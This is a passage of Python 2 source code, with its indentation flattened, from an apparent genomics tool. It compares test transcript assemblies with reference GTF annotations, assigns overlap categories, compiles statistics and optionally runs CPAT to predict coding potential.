splicing_pattern.append(n)
splicing_pattern = tuple(splicing_pattern)
if len(splicing_pattern) > 0:
if is_ref:
splicing_pattern_dict[splicing_pattern].has_ref = True
else:
d = splicing_pattern_dict[splicing_pattern]
d.has_test = True
d.category = t.attrs['category']
# handle unstranded transcripts
for t in unstranded_transcripts:
# separate ref and nonref transcripts
is_ref = bool(int(t.attrs[GTFAttr.REF]))
for n in split_exons(t, boundaries):
found_node = False
for strand in (POS_STRAND, NEG_STRAND):
sn = (strand, n[0], n[1])
if sn in node_dict:
if is_ref:
node_dict[sn].has_ref = True
else:
d = node_dict[sn]
d.has_test = True
d.category = t.attrs['category']
found_node = True
if not found_node:
sn = (NO_STRAND, n[0], n[1])
if is_ref:
node_dict[sn].has_ref = True
else:
d = node_dict[sn]
d.has_test = True
d.category = t.attrs['category']
introns = list(t.iterintrons())
assert len(introns) == 0
# compile statistics
for d in intron_dict.itervalues():
if d.has_ref and d.has_test:
self.introns_both += 1
self.introns_by_category[d.category] += 1
elif d.has_ref:
self.introns_ref_only += 1
elif d.has_test:
self.introns_test_only += 1
self.introns_by_category[d.category] += 1
for d in splicing_pattern_dict.itervalues():
if d.has_ref and d.has_test:
self.patterns_both += 1
self.patterns_by_category[d.category] += 1
elif d.has_ref:
self.patterns_ref_only += 1
elif d.has_test:
self.patterns_test_only += 1
self.patterns_by_category[d.category] += 1
for n,d in node_dict.iteritems():
strand, start, end = n
length = end - start
if d.has_ref and d.has_test:
self.cov_both += length
self.cov_by_category[d.category] += length
elif d.has_ref:
self.cov_ref_only += length
elif d.has_test:
self.cov_test_only += length
self.cov_by_category[d.category] += length
class Match(object):
def __init__(self):
self.nodes = collections.defaultdict(lambda: [])
self.introns = []
self.splicing = False
class MatchStats(object):
@staticmethod
def header_fields():
return ['transcript_id', 'gene_id', 'locus', 'length', 'num_introns',
'ref_transcript_id', 'ref_gene_id', 'ref_orig_gene_id', 'ref_gene_name',
'ref_source', 'ref_gene_type', 'ref_locus',
'ref_length', 'ref_num_introns',
'shared_same_strand_bp', 'shared_opp_strand_bp',
'shared_introns', 'shared_splicing',
'distance', 'category']
def __init__(self):
for field in MatchStats.header_fields():
setattr(self, field, None)
def __str__(self):
fields = []
for field in MatchStats.header_fields():
fields.append(getattr(self, field))
return '\t'.join(map(str,fields))
def copy(self):
other = MatchStats()
for field in MatchStats.header_fields():
setattr(other, field, getattr(self,field))
return other
def add_gtf_attributes(self, feature):
attrs = ['ref_transcript_id', 'ref_gene_id',
#'ref_orig_gene_id',
'ref_gene_name', 'ref_source', 'ref_gene_type',
#'ref_locus',
'ref_length', 'ref_num_introns',
'shared_same_strand_bp', 'shared_opp_strand_bp',
'shared_introns', 'shared_splicing',
#'distance',
'category']
for attr in attrs:
v = getattr(self, attr)
feature.attrs[attr] = v
@staticmethod
def from_transcript(t, ref=None):
self = MatchStats()
self.transcript_id = t.attrs[GTFAttr.TRANSCRIPT_ID]
if GTFAttr.GENE_ID not in t.attrs.keys():
self.gene_id = t.attrs[GTFAttr.TRANSCRIPT_ID]
else:
self.gene_id = t.attrs[GTFAttr.GENE_ID]
self.locus = '%s:%d-%d[%s]' % (t.chrom, t.start, t.end, strand_int_to_str(t.strand))
self.length = t.length
self.num_introns = len(t.exons) - 1
if ref is not None:
self.ref_transcript_id = ref.attrs[GTFAttr.TRANSCRIPT_ID]
self.ref_gene_id = ref.attrs[GTFAttr.GENE_ID]
self.ref_locus = '%s:%d-%d[%s]' % (ref.chrom, ref.start, ref.end, strand_int_to_str(ref.strand))
self.ref_length = ref.length
self.ref_num_introns = len(ref.exons) - 1
self.ref_orig_gene_id = ref.attrs.get('orig_gene_id', self.ref_gene_id)
self.ref_source = ref.attrs.get('source', 'NA')
if 'gene_name' in ref.attrs:
self.ref_gene_name = ref.attrs['gene_name']
elif 'transcript_name' in ref.attrs:
self.ref_gene_name = ref.attrs['transcript_name']
else:
self.ref_gene_name = self.ref_gene_id
if 'gene_type' in ref.attrs:
self.ref_gene_type = ref.attrs['gene_type']
elif 'gene_biotype' in ref.attrs:
self.ref_gene_type = ref.attrs['gene_biotype']
elif 'transcript_type' in ref.attrs:
self.ref_gene_type = ref.attrs['transcript_type']
else:
self.ref_gene_type = 'None'
return self
@staticmethod
def choose_best(lst, transcript_id_to_source_dict=None):
hits = []
for m in lst:
total_introns = m.num_introns + m.ref_num_introns
if total_introns == 0:
intron_frac = 0.0
else:
intron_frac = float(m.shared_introns) / (total_introns - m.shared_introns)
same_strand_frac = float(m.shared_same_strand_bp) / (m.length + m.ref_length - m.shared_same_strand_bp)
opp_strand_frac = float(m.shared_opp_strand_bp) / (m.length + m.ref_length - m.shared_opp_strand_bp)
category_int = Category.to_int(m.category)
hits.append((int(m.shared_splicing), intron_frac,
same_strand_frac, opp_strand_frac,
int(category_int == Category.INTRONIC_SAME_STRAND),
int(category_int == Category.INTRONIC_OPP_STRAND),
int(category_int == Category.INTERLEAVING_SAME_STRAND),
int(category_int == Category.INTERLEAVING_OPP_STRAND),
int(category_int == Category.ENCOMPASSING_SAME_STRAND),
int(category_int == Category.ENCOMPASSING_OPP_STRAND),
int(category_int == Category.INTERGENIC),
-abs(m.distance), m))
# sort matches
max_value = (0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0)
max_match = None
if (transcript_id_to_source_dict == None):
for hit in hits:
if hit[:12] > max_value:
max_value = hit[:12]
max_match = hit[-1]
else:
# Use ENSEMBL in a tie situation
max_value = (0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0)
max_match = None
max_match_source = None
for hit in hits:
if hit[:12] >= max_value:
if (hit[:12] > max_value):
max_value = hit[:12]
max_match = hit[-1]
max_match_source = transcript_id_to_source_dict[hit[-1].ref_transcript_id]
elif (max_match != None) and (max_match_source != "ENSEMBL") and (transcript_id_to_source_dict[hit[-1].ref_transcript_id] == "ENSEMBL"):
max_value = hit[:12]
max_match = hit[-1]
max_match_source = "ENSEMBL"
return max_match
@staticmethod
def sort_genome(lst):
poslst = []
strands = []
for m in lst:
chrom, startend = m.ref_locus[:-3].split(':')
strands.append(m.ref_locus[-2])
start, end = map(int, startend.split('-'))
poslst.append((chrom, start, end, m))
reverse = any(x == '-' for x in strands)
poslst.sort(key=operator.itemgetter(0,1,2), reverse=reverse)
return [x[3] for x in poslst]
@staticmethod
def consensus(lst, transcript_id_to_source_dict=None):
if len(lst) == 0:
return None
# first check for read through transcripts involving multiple
# reference genes
same_strand_hits = collections.defaultdict(lambda: [])
for m in lst:
category_int = Category.to_int(m.category)
if category_int == Category.SAME_STRAND:
same_strand_hits[m.ref_gene_id].append(m)
# no same strand matches so don't need to worry about
# read-throughs or multiple gene types
if len(same_strand_hits) == 0:
return MatchStats.choose_best(lst)
# get consensus match from same strand overlapping genes
total_introns = lst[0].num_introns
total_length = lst[0].length
shared_introns = 0
shared_same_strand_bp = 0
hits = []
for genelst in same_strand_hits.itervalues():
m = MatchStats.choose_best(genelst, transcript_id_to_source_dict).copy()
m.ref_gene_type = ','.join(sorted(set(m.ref_gene_type for m in genelst)))
total_introns += m.ref_num_introns
total_length += m.ref_length
shared_introns += m.shared_introns
shared_same_strand_bp += m.shared_same_strand_bp
hits.append(m)
# sort reference genes by position
hits = MatchStats.sort_genome(hits)
# make a new MatchStats object
hit = hits[0].copy()
hit.ref_transcript_id = ','.join(x.ref_transcript_id for x in hits)
hit.ref_gene_id = ','.join(x.ref_gene_id for x in hits)
hit.ref_orig_gene_id = ','.join(x.ref_orig_gene_id for x in hits)
hit.ref_gene_name = ','.join(x.ref_gene_name for x in hits)
hit.ref_source = ','.join(x.ref_source for x in hits)
hit.ref_gene_type = ','.join(x.ref_gene_type for x in hits)
hit.ref_locus = ','.join(x.ref_locus for x in hits)
hit.ref_length = ','.join(str(x.ref_length) for x in hits)
hit.ref_num_introns = ','.join(str(x.ref_num_introns) for x in hits)
hit.shared_same_strand_bp = shared_same_strand_bp
hit.shared_opp_strand_bp = 0
hit.shared_introns = shared_introns
hit.shared_splicing = any(m.shared_splicing for m in hits)
hit.distance = 0
if len(same_strand_hits) > 1:
hit.category = Category.to_str(Category.READ_THROUGH)
return hit
def compare_locus(transcripts):
# store reference introns
# (strand,start,end) -> ids (set)
ref_intron_dict = collections.defaultdict(lambda: [])
ref_node_dict = collections.defaultdict(lambda: [])
ref_splicing_patterns = collections.defaultdict(lambda: [])
ref_dict = {}
# find the intron domains of the transcripts
boundaries = find_exon_boundaries(transcripts)
test_transcripts = []
for t in transcripts:
# print 'is_ref', t.attrs[GTFAttr.REF]
# separate ref and nonref transcripts
is_ref = bool(int(t.attrs[GTFAttr.REF]))
if is_ref:
# add to dict
ref_id = t.attrs[GTFAttr.TRANSCRIPT_ID]
ref_dict[ref_id] = t
# split exons that cross boundaries and get the
# nodes in the transcript path
for n in split_exons(t, boundaries):
ref_node_dict[n].append(t)
# add to introns
splicing_pattern = []
for start,end in t.iterintrons():
intron = (t.strand, start, end)
ref_intron_dict[intron].append(t)
splicing_pattern.append(intron)
# add to splicing patterns
if len(splicing_pattern) > 0:
ref_splicing_patterns[tuple(splicing_pattern)].append(t)
else:
test_transcripts.append(t)
# print test_transcripts
# index introns for fast intersection
intron_tree = IntervalTree()
for intron, refs in ref_intron_dict.iteritems():
strand, start, end = intron
intron_tree.insert_interval(Interval(start,end,strand=strand,value=refs))
# categorize transcripts
for t in test_transcripts:
# get transcript nodes and introns
nodes = list(split_exons(t, boundaries))
introns = []
for start,end in t.iterintrons():
introns.append((t.strand,start,end))
splicing_pattern = tuple(introns)
# keep list of all matching ref transcripts
matches = collections.defaultdict(lambda: Match())
# dict of reference transcripts -> category -> list of nodes
for n in nodes:
if n in ref_node_dict:
# look for reference transcripts that share this node
for ref in ref_node_dict[n]:
if cmp_strand(t.strand, ref.strand):
c = Category.SAME_STRAND
else:
c = Category.OPP_STRAND
ref_id = ref.attrs[GTFAttr.TRANSCRIPT_ID]
m = matches[ref_id]
m.nodes[c].append(n)
# look for reference introns that overlap this node
for hit in intron_tree.find(*n):
if cmp_strand(t.strand, hit.strand):
c = Category.INTRONIC_SAME_STRAND
else:
c = Category.INTRONIC_OPP_STRAND
for ref in hit.value:
ref_id = ref.attrs[GTFAttr.TRANSCRIPT_ID]
m = matches[ref_id]
m.nodes[c].append(n)
# dict of introns -> list of reference transcripts
for intron in introns:
if intron in ref_intron_dict:
for ref in ref_intron_dict[intron]:
ref_id = ref.attrs[GTFAttr.TRANSCRIPT_ID]
m = matches[ref_id]
m.introns.append(intron)
# check splicing pattern matches
if len(splicing_pattern) > 0:
if splicing_pattern in ref_splicing_patterns:
for ref in ref_splicing_patterns[splicing_pattern]:
ref_id = ref.attrs[GTFAttr.TRANSCRIPT_ID]
m = matches[ref_id]
m.splicing = True
# go through the matches for this transcript and determine
# the transcript category
match_stats = []
for ref_id, m in matches.iteritems():
ref = ref_dict[ref_id]
# calculate coverage
same_strand_bp = sum((n[1] - n[0]) for n in m.nodes[Category.SAME_STRAND])
opp_strand_bp = sum((n[1] - n[0]) for n in m.nodes[Category.OPP_STRAND])
# count shared introns
num_shared_introns = len(m.introns)
# decide category for this test/ref transcript pair
if m.splicing or (num_shared_introns > 0) or (same_strand_bp > 0):
c = Category.SAME_STRAND
elif (opp_strand_bp > 0):
c = Category.OPP_STRAND
else:
# count nodes of different types
num_same_strand = len(m.nodes[Category.SAME_STRAND])
num_opp_strand = len(m.nodes[Category.OPP_STRAND])
num_intronic_same_strand = len(m.nodes[Category.INTRONIC_SAME_STRAND])
num_intronic_opp_strand = len(m.nodes[Category.INTRONIC_OPP_STRAND])
assert num_same_strand == 0
assert num_opp_strand == 0
num_intronic = (num_intronic_same_strand +
num_intronic_opp_strand)
assert num_intronic > 0
if (num_intronic == len(nodes)):
# completely intronic
if num_intronic_same_strand > 0:
c = Category.INTRONIC_SAME_STRAND
else:
c = Category.INTRONIC_OPP_STRAND
else:
# interleaving means some nodes intronic and other intergenic
if num_intronic_same_strand > 0:
c = Category.INTERLEAVING_SAME_STRAND
else:
c = Category.INTERLEAVING_OPP_STRAND
# create a match object
ms = MatchStats.from_transcript(t, ref)
ms.shared_same_strand_bp = same_strand_bp
ms.shared_opp_strand_bp = opp_strand_bp
ms.shared_introns = num_shared_introns
ms.shared_splicing = m.splicing
ms.category = Category.to_str(c)
ms.distance = 0
match_stats.append(ms)
yield (t, match_stats)
def build_locus_trees(gtf_file):
transcripts = []
locus_cluster_trees = collections.defaultdict(lambda: ClusterTree(0,1))
for locus_transcripts in parse_gtf(open(gtf_file)):
for t in locus_transcripts:
is_ref = bool(int(t.attrs[GTFAttr.REF]))
if not is_ref:
continue
i = len(transcripts)
transcripts.append(t)
locus_cluster_trees[t.chrom].insert(t.start, t.end, i)
# build interval trees of loci
locus_trees = collections.defaultdict(lambda: IntervalTree())
for chrom, cluster_tree in locus_cluster_trees.iteritems():
for locus_start, locus_end, indexes in cluster_tree.getregions():
for i in indexes:
locus_transcripts = [transcripts[i] for i in indexes]
locus_trees[chrom].insert_interval(Interval(locus_start, locus_end, value=locus_transcripts))
return locus_trees
def find_nearest_transcripts(chrom, start, end, strand, locus_trees):
# first check for overlap
nearest_features = []
hits = locus_trees[chrom].find(start, end)
for hit in hits:
for t in hit.value:
if cmp_strand(t.strand, strand):
c = Category.ENCOMPASSING_SAME_STRAND
else:
c = Category.ENCOMPASSING_OPP_STRAND
nearest_features.append((t, c, 0))
# look left and right
left_hits = locus_trees[chrom].before(start, num_intervals=1, max_dist=MAX_LOCUS_DIST)
right_hits = locus_trees[chrom].after(end, num_intervals=1, max_dist=MAX_LOCUS_DIST)
# look for nearest hit
for hits in (left_hits, right_hits):
nearest_locus_hit = None
nearest_dist = MAX_LOCUS_DIST
for hit in hits:
dist = min(abs(start - hit.end), abs(hit.start - end))
if dist < nearest_dist:
nearest_dist = dist
nearest_locus_hit = hit
if nearest_locus_hit is not None:
for t in nearest_locus_hit.value:
dist = min(abs(start - t.end), abs(t.start - end))
nearest_features.append((t, Category.INTERGENIC, dist))
return nearest_features
def _parse_gtf_by_chrom(gtf_file):
current_chrom = None
exon_dict = collections.defaultdict(lambda: [])
transcript_dict = {}
for feature in GTFFeature.parse(open(gtf_file)):
if (feature.feature_type != "transcript") and (feature.feature_type != "exon"):
continue
if (current_chrom != feature.seqid):
if len(exon_dict) > 0:
yield current_chrom, transcript_dict, exon_dict
exon_dict = collections.defaultdict(lambda: [])
transcript_dict = {}
current_chrom = feature.seqid
t_id = feature.attrs[GTFAttr.TRANSCRIPT_ID]
if feature.feature_type == "transcript":
transcript_dict[t_id] = feature
elif feature.feature_type == "exon":
exon_dict[t_id].append(feature)
if len(exon_dict) > 0:
yield current_chrom, transcript_dict, exon_dict
def add_gtf_file(gtf_file, outfh, is_ref):
refval = '1' if is_ref else '0'
for chrom, transcript_dict, exon_dict in _parse_gtf_by_chrom(gtf_file):
logging.debug("\tfinished chrom %s %d features" % (chrom, len(exon_dict)))
# output reference transcripts
for t_id, features in exon_dict.iteritems():
# sort features (exons) by start position
features.sort(key=operator.attrgetter('start'))
# annotate exons as reference features
for f in features:
f.attrs[GTFAttr.REF] = refval
print >>outfh, str(f)
# transcript feature
if t_id in transcript_dict:
f = transcript_dict[t_id]
else:
f = GTFFeature()
f.seqid = features[0].seqid
f.source = features[0].source
f.feature_type = 'transcript'
f.start = features[0].start
f.end = features[-1].end
f.score = features[0].score
f.strand = features[0].strand
f.phase = '.'
f.attrs = features[0].attrs.copy()
if "exon_number" in f.attrs:
del f.attrs["exon_number"]
f.attrs[GTFAttr.REF] = refval
print >>outfh, str(f)
def impute_transcript_type(catint, length, gene_type, ref_gene_type):
if (catint == Category.SAME_STRAND or
catint == Category.READ_THROUGH):
# impute gene type
transcript_type = ref_gene_type
else:
if gene_type == 'protein_coding':
# don't change protein coding genes
transcript_type = gene_type
elif length < 250:
# categorize small RNA separately
transcript_type = 'misc_RNA'
else:
transcript_type = 'lincRNA'
return transcript_type
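# Illustrative behaviour of impute_transcript_type(): same_strand/read_through
# matches inherit the reference gene type; otherwise protein_coding is kept,
# transcripts shorter than 250 bp become 'misc_RNA', and longer unannotated
# transcripts default to 'lincRNA'.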
def parse_and_output_gtf_file(input_gtf_file, tmp_dir, is_ref, num_cores):
parallel_sort_cmd = False
with open(os.devnull, "w") as fnull:
cmdline = 'echo "2 1" | %s --parallel=2'
if subprocess.call(cmdline % 'gsort', stdout=fnull, stderr=fnull, shell=True) == 0:
parallel_sort_cmd = 'gsort'
if subprocess.call(cmdline % 'sort', stdout=fnull, stderr=fnull, shell=True) == 0:
parallel_sort_cmd = 'sort'
if not parallel_sort_cmd:
logging.warning('Command line "sort" command does not support '
'--parallel flag. For improved performance, consider '
'upgrading/installing the latest GNU coreutils to '
'enable parallel sort.')
args = ["sort"]
else:
logging.debug('Command line "sort" supports --parallel flag')
args = [parallel_sort_cmd, '--parallel=%d' % num_cores]
if tmp_dir is not None:
args.extend(["-T", tmp_dir])
args.extend(["-k1,1", input_gtf_file])
myenv = os.environ.copy()
myenv["LC_ALL"] = "C"
subprocess.call(args, stdout=open(os.path.join(tmp_dir, "input." + str(is_ref) + ".srt.gtf"), "w"), env=myenv)
curr_seqid = None
outfh = None
with open(os.path.join(tmp_dir, "input." + str(is_ref) + ".srt.gtf"), "r") as sorted_input_file:
for input_line in sorted_input_file:
if (input_line[0] == '#'):
continue
seqname, source, feature, start, end, score, strand, frame, attribute = input_line.replace("\n", "").split("\t")
seqname = seqname.translate(None, string.punctuation).replace(" ", "")
if (curr_seqid == seqname):
outfh.write(input_line)
else:
try:
outfh.close()
except:
pass
seq_id_folder = os.path.join(tmp_dir, str(seqname))
if not os.path.exists(seq_id_folder):
logging.debug("Creating tmp seqid directory '%s'" % (seq_id_folder))
os.makedirs(seq_id_folder)
outfh = open(os.path.join(seq_id_folder, "input." + str(is_ref) + ".srt.gtf"), "w")
outfh.write(input_line)
curr_seqid = seqname
def compare_assemblies_worker(input_queue):
while True:
output_dir = input_queue.get()
if (output_dir == None):
input_queue.task_done()
break
ref_file = os.path.join(output_dir, "input.1.srt.gtf")
test_file = os.path.join(output_dir, "input.0.srt.gtf")
if not (os.path.isfile(ref_file) and os.path.isfile(test_file)):
logging.info("Skipping: " + os.path.basename(output_dir) +
" because reference and test have 0 overlap")
input_queue.task_done()
continue
# merge step
merged_gtf_file = os.path.join(output_dir, "merged.gtf")
merged_sorted_gtf_file = os.path.splitext(merged_gtf_file)[0] + ".srt.gtf"
merge_done_file = os.path.join(output_dir, 'merged.done')
sort_done_file = os.path.join(output_dir, 'sort.done')
if not os.path.exists(merge_done_file):
# merge and sort ref/test gtf files
logging.info("Merging reference and test GTF files")
# make temporary file to store merged ref/test gtf files
with open(merged_gtf_file, "w") as fileh:
logging.info("Adding reference GTF file")
add_gtf_file(ref_file, fileh, True)
logging.info("Adding test GTF file")
add_gtf_file(test_file, fileh, False)
open(merge_done_file, 'w').close()
if not os.path.exists(sort_done_file):
logging.info("Sorting merged GTF file")
# create temp directory
tmp_dir = os.path.join(output_dir, 'tmp')
if not os.path.exists(tmp_dir):
logging.debug("Creating tmp directory '%s'" % (tmp_dir))
os.makedirs(tmp_dir)
sort_gtf(merged_gtf_file, merged_sorted_gtf_file, tmp_dir)
# cleanup
shutil.rmtree(tmp_dir)
open(sort_done_file, 'w').close()
# generate transcript_id to source dict
transcript_id_to_source_dict = {}
for feature in GTFFeature.parse(open(merged_sorted_gtf_file, "r")):
transcript_id_to_source_dict[feature.attrs['transcript_id']] = feature.source
# compare assemblies
overlapping_gtf_file = os.path.join(output_dir, 'overlapping.gtf')
intergenic_tmp_gtf_file = os.path.join(output_dir, 'intergenic.tmp.gtf')
overlapping_file = os.path.join(output_dir, 'overlapping.tsv')
# overlapping_consensus_file = os.path.join(output_dir, 'overlapping.consensus.tsv')
overlapping_done_file = os.path.join(output_dir, 'overlapping.done')
stats_file = os.path.join(output_dir, 'stats.txt')
stats_obj = GlobalStats()
num_intergenic = 0
if not os.path.exists(overlapping_done_file):
logging.info("Comparing assemblies")
gtf_fileh = open(overlapping_gtf_file, 'w')
tmp_gtf_fileh = open(intergenic_tmp_gtf_file, 'w')
# overlapping_fileh = open(overlapping_file, 'w')
# overlapping_consensus_fileh = open(overlapping_consensus_file, 'w')
for locus_transcripts in parse_gtf(open(merged_sorted_gtf_file)):
locus_chrom = locus_transcripts[0].chrom
locus_start = locus_transcripts[0].start
locus_end = max(t.end for t in locus_transcripts)
logging.debug("[LOCUS] %s:%d-%d %d transcripts" %
(locus_chrom, locus_start, locus_end,
len(locus_transcripts)))
for t, match_stats in compare_locus(locus_transcripts):
if len(match_stats) == 0:
# write intergenic transcripts to analyze separately
t.attrs['category'] = Category.to_str(Category.INTERGENIC)
for f in t.to_gtf_features(source='assembly'):
print >>tmp_gtf_fileh, str(f)
num_intergenic += 1
else:
# get consensus match information
consensus_match = MatchStats.consensus(match_stats, transcript_id_to_source_dict)
assert consensus_match is not None
t.attrs['category'] = consensus_match.category
# add gtf attributes and write
for f in t.to_gtf_features(source='assembly'):
if t.attrs['category'] != 'intergenic':
consensus_match.add_gtf_attributes(f)
print >>gtf_fileh, str(f)
# tab-delimited text output
# print >>overlapping_consensus_fileh, str(consensus_match)
# for ms in match_stats:
# print >>overlapping_fileh, str(ms)
# compute global statistics
stats_obj.compute(locus_transcripts)
logging.debug("Reporting global statistics")
with open(stats_file, 'w') as f:
print >>f, stats_obj.report()
gtf_fileh.close()
tmp_gtf_fileh.close()
# overlapping_fileh.close()
# overlapping_consensus_fileh.close()
open(overlapping_done_file, 'w').close()
# resolve intergenic transcripts
intergenic_gtf_file = os.path.join(output_dir, 'intergenic.gtf')
intergenic_file = os.path.join(output_dir, 'intergenic.tsv')
intergenic_best_file = os.path.join(output_dir, 'intergenic.best.tsv')
intergenic_done_file = os.path.join(output_dir, 'intergenic.done')
if not os.path.exists(intergenic_done_file):
logging.debug("Characterizing transcripts with complex overlap")
locus_trees = build_locus_trees(merged_sorted_gtf_file)
logging.debug('Finding nearest matches to intergenic transcripts')
gtf_fileh = open(intergenic_gtf_file, 'w')
# intergenic_fileh = open(intergenic_file, 'w')
intergenic_best_fileh = open(intergenic_best_file, 'w')
def wc(infile):
p = subprocess.Popen('wc -l %s' % infile, shell=True, stdout=subprocess.PIPE)
out, err = p.communicate()
return int(out.split()[0])
if wc(intergenic_tmp_gtf_file) != 0:
for locus_transcripts in parse_gtf(open(intergenic_tmp_gtf_file)):
for t in locus_transcripts:
# find nearest transcripts
nearest_transcripts = find_nearest_transcripts(t.chrom, t.start, t.end, t.strand, locus_trees)
match_stats = []
best_match = None
if len(nearest_transcripts) == 0:
best_match = MatchStats.from_transcript(t)
best_match.category = Category.to_str(Category.INTERGENIC)
match_stats.append(best_match)
else:
for ref,category,dist in nearest_transcripts:
# create a match object
ms = MatchStats.from_transcript(t, ref)
ms.shared_same_strand_bp = 0
ms.shared_opp_strand_bp = 0
ms.shared_introns = 0
ms.shared_splicing = False
ms.category = Category.to_str(category)
ms.distance = dist
match_stats.append(ms)
# choose the consensus match
best_match = MatchStats.choose_best(match_stats)
# add gtf attributes and write
for f in t.to_gtf_features(source='assembly'):
# best_match.add_gtf_attributes(f)
print >>gtf_fileh, str(f)
# write tab-delimited data
# print >>intergenic_best_fileh, str(best_match)
# for ms in match_stats:
# print >>intergenic_fileh, str(ms)
gtf_fileh.close()
# intergenic_fileh.close()
intergenic_best_fileh.close()
open(intergenic_done_file, 'w').close()
# merge overlapping and intergenic results
metadata_file = os.path.join(output_dir, 'metadata.txt')
metadata_consensus_file = os.path.join(output_dir, 'metadata.consensus.txt')
assembly_gtf_file = os.path.join(output_dir, 'assembly.cmp.gtf')
combine_done_file = os.path.join(output_dir, 'combine.done')
if not os.path.exists(combine_done_file):
logging.debug('Merging results')
# filenames = [overlapping_file, intergenic_file]
# with open(metadata_file, 'w') as outfile:
# print >>outfile, '\t'.join(MatchStats.header_fields())
# for fname in filenames:
# with open(fname) as infile:
# for line in infile:
# outfile.write(line)
filenames = [intergenic_best_file]
with open(metadata_consensus_file, 'w') as outfile:
print >>outfile, '\t'.join(MatchStats.header_fields())
for fname in filenames:
with open(fname) as infile:
for line in infile:
outfile.write(line)
filenames = [intergenic_gtf_file, overlapping_gtf_file]
with open(assembly_gtf_file, 'w') as outfile:
for fname in filenames:
with open(fname) as infile:
for line in infile:
outfile.write(line)
open(combine_done_file, 'w').close()
input_queue.task_done()
def compare_assemblies(ref_gtf_file, test_gtf_file, output_dir, output_final, cpat, num_cores):
# output files
if not os.path.exists(output_dir):
logging.debug('Creating tmp dir: %s' % (output_dir))
os.makedirs(output_dir)
# split input GTFs into chromosome-large GTFs
parse_and_output_gtf_file(ref_gtf_file, output_dir, 1, num_cores)
parse_and_output_gtf_file(test_gtf_file, output_dir, 0, num_cores)
input_queue = multiprocessing.JoinableQueue(maxsize = num_cores)
procs = []
for i in xrange(num_cores):
p = multiprocessing.Process(target=compare_assemblies_worker, args=(input_queue, ))
p.start()
procs.append(p)
for folder in [x[0] for x in os.walk(output_dir) if x[0] != output_dir]:
input_queue.put(folder)
for element in [None] * num_cores:
input_queue.put(element)
# close input queue
input_queue.join()
input_queue.close()
# join worker processes
for p in procs:
p.join()
# Merge all the chromosomes
assembly_gtf_file = os.path.join(output_dir, "assembly.cmp.gtf")
with open(assembly_gtf_file, "w") as outfh:
for folder in [x[0] for x in os.walk(output_dir)]:
assembled_chrom_gtf_file = os.path.join(folder, "assembly.cmp.gtf")
if not os.path.isfile(assembled_chrom_gtf_file):
continue
with open(assembled_chrom_gtf_file, "r") as inputfh:
for line in inputfh:
outfh.write(line)
if wc(assembly_gtf_file) == 0:
logging.error('Zero overlap for reference and test GTFs. '
'Ensure they are from the same species / genome.')
sys.exit()
# read compared assembly and add annotation status / final category
if cpat['run']:
logging.info('Running coding potential prediction')
#make bed file
assembly_bed_cpat_file = os.path.abspath(os.path.join(output_dir, 'assembly.cpat.bed'))
logging.debug('Converting GTF to BED for CPAT')
with open(assembly_bed_cpat_file, 'w') as f:
for transcripts in parse_gtf(open(assembly_gtf_file)):
for t in transcripts:
if 'gene_id' in t.attrs.keys():
name = '%s|%s' % (t.attrs['gene_id'], t.attrs['transcript_id'])
else:
name = t.attrs['transcript_id']
fields = write_bed(t.chrom, name, t.strand, 1000, t.exons)
print >>f, '\t'.join(fields)
cpat_tsv_file = os.path.abspath(os.path.join(output_dir, 'cpat.tsv'))
logging.info('Running CPAT')
cmd = [
cpat['exec'],
'-g', assembly_bed_cpat_file,
'-o', cpat_tsv_file,
'-x', cpat['hex'],
'-d', cpat['model'],
'-r', cpat['genome']
]
subprocess.call(' '.join(cmd), shell=True, cwd=output_dir)
cpat_dict = {}
fileh = open(cpat_tsv_file)
header = fileh.next().strip().split('\t')
tid_idx = 0
orf_idx = 2
prob_idx = 5
for line in fileh:
line = line.strip().split('\t')
tid = line[tid_idx].split('|')[1]
orf = line[orf_idx]
prob = line[prob_idx]
cpat_dict[tid] = (orf, prob)
#### RECATEGORIZE THE GENCODE ANNOTATION CATEOGRY #####
# ANNOTATED = ['same_strand', 'read_through']
# UNANNOTATED = ['opp_strand', 'intronic_same_strand', 'intronic_opp_strand',
# 'interleaving_same_strand', 'interleaving_opp_strand',
# 'encompassing_opp_strand', 'encompassing_same_strand',
# 'intergenic']
assembly_refcomp_file = os.path.join(output_final, 'assembly.refcomp.gtf')
final_gtf_done_file = os.path.join(output_dir, 'finalgtf.done')
if not os.path.exists(final_gtf_done_file):
logging.info('Generating final GTF file')
with open(assembly_refcomp_file, 'w') as gtf_final:
for locus_transcripts in parse_gtf(open(assembly_gtf_file)):
for t in locus_transcripts:
tid = t.attrs['transcript_id']
if cpat['run']:
orf, prob = cpat_dict[tid]
t.attrs['orf_size'] = orf
t.attrs['cpat_coding_prob'] = prob
catstr = t.attrs['category']
catint = Category.to_int(catstr)
length = t.length
gene_type = t.attrs.get('gene_type', None)
cat = t.attrs['category']
t.attrs['category_relative_detail'] = cat
if cat in ['same_strand', 'read_through']:
cat_rel = 'exonic_overlap'
elif cat == 'intergenic':
cat_rel = 'intergenic'
else:
cat_rel = 'intragenic'
t.attrs['category_relative'] = cat_rel
if 'ref_gene_type' in t.attrs.keys():
ref_gene_name = ','.join(set(t.attrs['ref_gene_name'].split(',')))
t.attrs['ref_gene_name'] = ref_gene_name
ref_gene_type = t.attrs['ref_gene_type']
ref_gene_types = set(ref_gene_type.split(','))
transcript_types = set(impute_transcript_type(catint, length, gene_type, x) for x in ref_gene_types)
t.attrs['ref_gene_type'] = ','.join(transcript_types)
transcript_categories = set(gencode_category_map(x) for x in transcript_types)
# sorted and join unique types/categories to make conglomerated category assignments
transcript_type = ','.join(sorted(transcript_types))
transcript_category = ','.join(sorted(transcript_categories))
# ref_cat_transform = GENCODE_CATEGORY_MAP[ref_gene]
transcript_category_final = transcript_category
if transcript_category in ['lncRNA', 'ncRNA', 'lncRNA,ncRNA']:
transcript_category_final = 'lncrna'
elif (',' in transcript_category) & (('protein' in transcript_category) | ('pseudo' in transcript_category)):
transcript_category_final = 'mixed_read_through'
t.attrs['annotation'] = 'annotated'
else:
if cpat['run']:
if float(prob) > cpat['cutoff']:
transcript_category_final = 'tucp'
else:
transcript_category_final = 'lncrna'
else:
transcript_category_final = 'lncrna'
t.attrs['annotation'] = 'unannotated'
t.attrs['category'] = transcript_category_final
if 'ref' in t.attrs.keys():
del t.attrs['ref']
if 'ref_num_introns' in t.attrs.keys():
del t.attrs['ref_num_introns']
if 'ref_source' in t.attrs.keys():
del t.attrs['ref_source']
for f in t.to_gtf_features(source='assembly'):
print >>gtf_final, str(f)
